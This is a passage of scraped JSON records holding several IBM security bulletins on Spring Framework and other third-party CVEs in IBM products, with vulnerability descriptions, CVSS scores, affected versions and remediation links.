**Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager| 7.3.0.0 - 7.3.0.9 \n \n\n\n## Remediation/Fixes\n\nIn order to fix these vulnerabilities, Spring is to be upgraded to 5.3.19 version. The efix to resolve these vulnerabilities can only be applied on **TADDM version 7.3.0.9** as per below given detailed steps. For customer at older TADDM Fixpack level (i.e., 7.3.0.8 or older), they need to first upgrade their TADDM environment to TADDM 7.3.0.9 level and then follow the step given below. \n\n**Detailed steps:**\n\n**For TADDM 7.3.0.9**, check if there is any previously applied eFixes in their TADDM environment.\n\n 1. If there is no prior efixes(ls -rlt etc/efix*) applied in their TADDM, then download the efix given in **Table-1 **and apply the efix.\n 2. If there are existing efixes on TADDM (ls -rlt etc/efix*), please contact IBM Support and open a case for a custom version of the eFix as the efix involves TADDM code changes. Include the current eFix level (ls -rlt etc/efix*), TADDM version and a link to this bulletin in the Support Case\n\n**For any other TADDM fixpack level** (i.e., 7.3.0.8 or older), to apply this bulletin, upgrade to TADDM 7.3.0.9 and then follow procedure as mentioned above for TADDM 7.3.0.9 .\n\n**Table-1**\n\nFix| \n\n**VRMF **\n\n| **APAR**| **How to acquire fix** \n---|---|---|--- \nefix_spring5.3.19_FP9211123.zip| \n\n7.3.0.9\n\n| None| [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=rmQy2k9MO4TQDYzI8KFdP32meDJ1UjEnPbvvT69QdHs> \"Download eFix\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T18:17:57", "type": "ibm", "title": "Security Bulletin: A vulnerability in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (CVE-2022-22950, CVE-2021-22096, CVE-2022-22968, CVE-2021-22060).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096", "CVE-2022-22950", "CVE-2022-22968"], "modified": "2022-05-12T18:17:57", "id": "537163AF6A43E9635AC6244334A6987334AAAED355BDEC033C662E7748C0C124", "href": "https://www.ibm.com/support/pages/node/6585760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-07T21:55:44", "description": "## Summary\n\nIBM Common Licensing is vulnerable to a remote code execution in Spring Framework (CVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968) as it does have Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Framework version 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Common Licensing| ART 8.1.6 \nIBM Common Licensing| ART 9.0 \nIBM Common Licensing| Agent 9.0 \n \n\n\n## Remediation/Fixes\n\nTheCVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968 flaw lies in Spring Framework. Spring has provided update fixes (Spring Framework 5.2.20 & 5.3.18+). The advisory cautions that the vulnerability is \"general, and there may be other ways to exploit it.\" \nIBM strongly recommends addressing the Spring framework vulnerability now by applying the suggested fix that uses Spring Framework 5.3.19. \n\n \nApply the ART and Agent ifix from fix central :\n\n[IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FRational%2FRational+Common+Licensing&fixids=IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1&source=SAR&function=fixId&parent=ibm/Rational> \"IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-01T07:16:30", "type": "ibm", "title": "Security Bulletin: IBM Common Licensing is vulnerable by a remote code attack in Spring Framework (CVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096", "CVE-2022-22950", "CVE-2022-22968"], "modified": "2022-06-01T07:16:30", "id": "B65E10799869808B38D96576AA4BC705E6DCC5744AAC77554C2319CB82A9DE27", "href": "https://www.ibm.com/support/pages/node/6591145", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-07T21:55:29", "description": "## Summary\n\nVulnerabilities contained within 3rd party components were identified and remediated in the IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and MaaS360 VPN module.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-0547](<https://vulners.com/cve/CVE-2022-0547>) \n** DESCRIPTION: **OpenVPN could allow a remote attacker to bypass security restrictions, caused by an authentication bypass vulnerability in external authentication plug-ins. By sending a specially-crafted request using multiple deferred authentication replies, an attacker could exploit this vulnerability to gain access with only partially correct credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222201](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222201>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2022-0778](<https://vulners.com/cve/CVE-2022-0778>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a flaw in the BN_mod_sqrt() function when parsing certificates. By using a specially-crafted certificate with invalid explicit curve parameters, a remote attacker could exploit this vulnerability to cause an infinite loop, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/221911](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221911>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**\n\n| \n\n**Version(s)** \n \n---|--- \n \nIBM MaaS360 VPN Module\n\n| \n\n2.106.100 and prior \n \nIBM MaaS360 Mobile Enterprise Gateway\n\n| \n\n2.106.200 and prior \n \nIBM MaaS360 Cloud Extender Agent\n\n| \n\n2.106.100.008 and prior \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n1\\. Update the IBM MaaS360 Mobile Enterprise Gateway and the MaaS360 VPN Module to version 2.106.500 or higher. Instructions on how to upgrade the Mobile Enterprise Gateway and VPN Module is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=ice-upgrading-mobile-enterprise-gateway-meg-maas360-vpn-modules> \"page\" ).\n\n2\\. Update the IBM MaaS360 Cloud Extender to version 2.106.500.011 or greater. The latest Cloud Extender agent is available within the MaaS360 Administrator Portal. Instructions to upgrade the Agent is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=extender-upgrading-cloud> \"page\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T18:27:01", "type": "ibm", "title": "Security Bulletin: IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and VPN module have multiple vulnerabilities (CVE-2021-22060, CVE-2022-22950, CVE-2022-0547, CVE-2022-0778, CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-0547", "CVE-2022-0778", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-06-06T18:27:01", "id": "14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "href": "https://www.ibm.com/support/pages/node/6592807", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:55:48", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework used by SPSS Collaboration and Deployment Services. SPSS Collaboration and Deployment Services is affected but not classified as vulnerable to these issues. The fix includes Spring 5.3.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22970](<https://vulners.com/cve/CVE-2022-22970>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw in the handling of file uploads. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226491](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226491>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22971](<https://vulners.com/cve/CVE-2022-22971>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw with a STOMP over WebSocket endpoint. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226492](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226492>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \nSPSS Collaboration and Deployment Services| 8.2.2 \nSPSS Collaboration and Deployment Services| 8.2.1 \nSPSS Collaboration and Deployment Services| 8.2 \nSPSS Collaboration and Deployment Services| 8.1.1 \nSPSS Collaboration and Deployment Services| 8.1 \nSPSS Collaboration and Deployment Services| 8.0 \n \n\n\n## Remediation/Fixes\n\nProduct | VRMF| Remediation/First Fix \n---|---|--- \nSPSS Collaboration and Deployment Services| 8.3.0.0| [8.3.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.3.0.0-IM-SCaDS-IF008&source=SAR> \"8.3.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.2.0| [8.2.2.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.2.0-IM-SCaDS-IF009&source=SAR> \"8.2.2.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.1.0| [8.2.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.1.0-IM-SCaDS-IF007&source=SAR> \"8.2.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.0.0| [8.2.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.0.0-IM-SCaDS-IF007&source=SAR> \"8.2.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.1.0 \n| [8.1.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.1.0-IM-SCaDS-IF008&source=SAR> \"8.1.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.0.0 \n| [8.1.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.0.0-IM-SCaDS-IF009&source=SAR> \"8.1.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.0.0.0 \n| [8.0.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.0.0.0-IM-SCaDS-IF009&source=SAR> \"8.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T14:20:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Spring Framework affect SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22971"], "modified": "2022-05-30T14:20:34", "id": "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "href": "https://www.ibm.com/support/pages/node/6590869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:54:09", "description": "## Summary\n\nThere are multiple vulnerabilities in components of IBM i Modernization Engine for Lifecycle Integration as described in the Vulnerability Details section. Guava, Red Hat Single Sign-On, Springfox and Spring Security could allow a remote attacker to bypass security restrictions (CVE-2020-8908, CVE-2022-1466, CVE-2022-22978, 221376). Vmware Tanzu Spring Framework and FasterXML are vulnerable to a denial of service (CVE-2022-22970, CVE-2020-36518, CVE-2022-22950). Spring Framework and PostgreSQL JDBC Driver (PgJDBC) could allow a remote attacker to execute arbitrary code on the system (CVE-2022-22965, CVE-2022-21724). Spring Security and Spring Framework could provide weaker than expected security (CVE-2022-22976, CVE-2022-22968). Apache Commons IO could allow a remote attacker to traverse directories on the system (CVE-2021-29425). swagger-ui could allow a remote attacker to conduct spoofing attacks (CVE-2018-25031). pgjdbc could allow an attacker to write to arbitrary files (CVE-2022-26520). Swagger UI could allow a remote attacker to conduct phishing attacks (221508). PostgreSQL JDBC Driver could allow a remote attacker to gain unauthorized access to the system (220313). These components are used in IBM i Modernization Engine for Lifecycle Integration for infrastructure support in the platform. IBM has addressed the vulnerabilities in IBM i Modernization Engine for Lifecycle Integration with updates to affected components.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8908](<https://vulners.com/cve/CVE-2020-8908>) \n** DESCRIPTION: **Guava could allow a remote authenticated attacker to bypass security restrictions, caused by a temp directory creation vulnerability in com.google.common.io.Files.createTempDir(). By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192996](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192996>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-22970](<https://vulners.com/cve/CVE-2022-22970>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw in the handling of file uploads. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226491](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226491>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-1466](<https://vulners.com/cve/CVE-2022-1466>) \n** DESCRIPTION: **Red Hat Single Sign-On could allow a remote authenticated attacker to bypass security restrictions, caused by improper authorization for master realm. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform unauthorized actions. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/225395](<https://exchange.xforce.ibmcloud.com/vulnerabilities/225395>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H) \n \n** CVEID: **[CVE-2022-22976](<https://vulners.com/cve/CVE-2022-22976>) \n** DESCRIPTION: **Spring Security could provide weaker than expected security, caused by an integer overflow vulnerability which results in a lack of salt rounds when using the BCrypt class with the maximum work factor. A local authenticated attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226733](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226733>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-29425](<https://vulners.com/cve/CVE-2021-29425>) \n** DESCRIPTION: **Apache Commons IO could allow a remote attacker to traverse directories on the system, caused by improper input validation by the FileNameUtils.normalize method. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/199852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199852>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-36518](<https://vulners.com/cve/CVE-2020-36518>) \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by a Java StackOverflow exception. By using a large depth of nested objects, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222319](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222319>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-25031](<https://vulners.com/cve/CVE-2018-25031>) \n** DESCRIPTION: **swagger-ui could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a specially-crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ 